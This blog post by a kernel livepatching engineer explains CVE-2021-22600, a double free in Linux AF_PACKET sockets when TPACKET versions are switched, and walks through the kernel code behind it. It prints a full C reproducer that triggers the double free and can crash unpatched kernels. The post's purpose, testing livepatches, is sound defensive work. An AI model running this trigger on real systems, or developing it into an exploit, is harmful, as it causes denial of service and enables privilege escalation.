The main responsibility of the Kernel Livepatching team at SUSE is to create livepatches for critical
security bugs. More important than fixing the bug itself is to guarantee that the livepatch will solve
the original problem and not create new ones, so testing the fix properly is crucial.
To test a livepatch, you need a way to reproduce the original bug, but how to test a livepatch when
you don’t have a reproducer? Today I’ll share my history of creating a reproducer for a security bug
and how it ended up being merged into Linux Testing Project.
The security bug#
Very often commits merged on the upstream Linux repository are disguised as simple code fixes, but
in fact, they are solving critical issues. Take for example
this patch.
This change fixes a double free buf after switching
AF_PACKET socket interface versions. The details of this problem are described in
CVE-2021-22600. The fix for this bug seems
harmless, and the creation of a livepatch was straightforward.
The problem is that there wasn’t a reproducer ready for testing this CVE patch. Without a
reproducer one needed to be created.
Packet sockets#
The man pages describes that: “Packet
sockets are used to receive or send raw packets at the device driver (OSI Layer 2) level.
They allow the user to implement protocol modules in user space on top of the physical layer”.
According to the official kernel documentation on
Packet MMAP,
there are currently three TPACKET versions, where tpacket_version can be TPACKET_V1 (default),
TPACKET_V2 and TPACKET_V3.
In summary, the bug consists of a stale pointer when switching between TPACKET versions.
Reproducer#
To create a reproducer there are some questions that need to be answered. For example, what is
the problem, and how it manifests? Looking at the commit message that fixes the issue, it was
mentioned that rx_owner_map can be stale when changing the protocol version on
packet_set_ring function. This function is called whenever a userspace program calls
setsockopt with a packet socket,
as we can see below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
|
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;
...
if (req->tp_block_nr) {
...
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) {
init_prb_bdqc(po, rb, pg_vec, req_u);
} else {
struct tpacket_req3 *req3 = &req_u->req3;
if (req3->tp_retire_blk_tov ||
req3->tp_sizeof_priv ||
req3->tp_feature_req_word) {
err = -EINVAL;
goto out_free_pg_vec;
}
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}
/* Done */
else {
err = -EINVAL;
if (unlikely(req->tp_frame_nr))
goto out;
}
...
mutex_lock(&po->pg_vec_lock);
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map);
...
}
mutex_unlock(&po->pg_vec_lock);
out_free_pg_vec:
bitmap_free(rx_owner_map);
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr);
out:
return err;
}
|
Note: The code above doesn’t contain the
patch
that fixes the bug.
Let’s now check the struct where rx_owner_map exists:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
struct packet_ring_buffer {
struct pgv *pg_vec;
unsigned int head;
unsigned int frames_per_block;
unsigned int frame_size;
unsigned int frame_max;
unsigned int pg_vec_order;
unsigned int pg_vec_pages;
unsigned int pg_vec_len;
unsigned int __percpu *pending_refcnt;
union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};
|
As we can see rx_owner_map is part of a union. The patch commit message mentions a stale
pointer, so we can deduct that when the swap(rb->rx_owner_map, rx_owner_map) is called we
can be dealing with prb_bdqc, and not with rx_owner_map. At this point, it’s useful
to have userspace code to exercise the mentioned functions and start poking around it. The
fastest way to search for userspace code using a Linux kernel feature is by checking the
Linux Kernel selftests
and the Linux Testing Project.
Both projects contain good examples about how to use different kernel features. It was quick
to find an example
of TPACKET usage on LTP.
With a test case in hand and some understanding of what is going wrong, we can check how
rx_owner_map ends up containing stale data:
- When calling setsockopt using TPACKET_V3, RX ring and setting tp_block_nr, pg_vec is
allocated and init_prb_bdqc is called setting prb_bdqc union member.
- If the next call to setsockopt, setting tp_block_nr and tp_frame_nr as 0, pg_vec and
rx_owner_map are released (or it would be prb_bdqc here, since it’s an union?), since
po->mapped is always 0 here (mmap wasn’t called to map the buffer)
- Calling setsockopt using TPACKET_V2 passing tp_block_nr and tp_frame_nr as 0, the code goes
directly to release the swapped rx_owner_map that was already released in the previous step.
- Double free.
Using the test case as a starting point, I was able to create my own reproducer:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
|
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
int sock;
struct ring {
union {
struct tpacket_req req;
struct tpacket_req3 req3;
};
};
static void set_ver(int ver)
{
if (setsockopt(sock, SOL_PACKET, PACKET_VERSION, &ver, sizeof(ver)) == -1) {
perror("setsockopt");
fprintf(stderr, "Cannot set sock to ver %d\n", ver + 1);
exit(1);
}
}
static void __v3_fill(struct ring *ring)
{
ring->req3.tp_retire_blk_tov = 64;
ring->req3.tp_sizeof_priv = 0;
ring->req3.tp_feature_req_word = TP_FT_REQ_FILL_RXHASH;
ring->req3.tp_block_size = getpagesize() << 2;
ring->req3.tp_frame_size = TPACKET_ALIGNMENT << 7;
ring->req3.tp_block_nr = 256;
ring->req3.tp_frame_nr = ring->req3.tp_block_size /
ring->req3.tp_frame_size *
ring->req3.tp_block_nr;
}
static void setup_ring(int mess)
{
struct ring ring;
__v3_fill(&ring);
/*
* First time we call setup_ring, using TPACKET_V3, we send the req3
* as populated by __v3_fill. In the next calls, we zero two members of
* the struct, simulating a 'close' of the socket. This makes afpacket
* module to free pg_vec.
*
* tpacket_v3 does not allocate rx_owner_map, but instead it sets
* prb_bdqc, but both are define in a union.
*/
if (mess) {
ring.req3.tp_block_nr = 0;
ring.req3.tp_frame_nr= 0;
}
if (setsockopt(sock, SOL_PACKET, PACKET_RX_RING, &ring.req3,
sizeof(ring.req3)) == -1) {
perror("setsockopt");
exit(1);
}
}
int main(void)
{
sock = socket(PF_PACKET, SOCK_RAW, 0);
if (sock == -1) {
perror("socket");
exit(1);
}
set_ver(TPACKET_V3);
/* Send complete req3 data */
setup_ring(0);
/*
* Pass tp_block_nr and tp_frame_nr, releases pg_vec, and rb->rw_owner_map
* is freed
* */
setup_ring(1);
/* With pg_vec released, we can change the socket version to TPACKET_V2 */
set_ver(TPACKET_V2);
/*
* With V2, we send again the tp_block_nr/tp_frame_nr zeroed, so
* afpacket does not try to allocate a pg_vec of rx_owner_map and goes
* directly to the cleaning part. For V1/V2, it swaps the current
* allocated rw_owner_map (which wasn't allocated this time) with the
* previously stored rw_owner_map (freed in the second setup_ring call
* above).
*
* Now, double free on the way!
*/
setup_ring(1);
return 0;
}
|
The comments in the code explains what exactly happens.
Be careful: if you are running a kernel without the fix applied (earlier than v5.16-rc6),
running the code above can crash your system.
Is a common practice in SUSE to check with QA if a reproducer can be adapted and merged
into LTP. In my case, Martin Doucha was kind enough to adapt the code using the LTP API and
merge it.
Considerations#
The entire process of checking the bug, understanding the problem, checking for reproducer
and triggering it reliably was gratifying. The kernel samples and the LTP are interesting
resources for research and understanding how kernel interfaces are used, and also to
check if a kernel is vulnerable to a known problem that already contains a reproducer.
Thanks for reading until the end. See you in the next post!
References#
CVE commit fix
LTP reproducer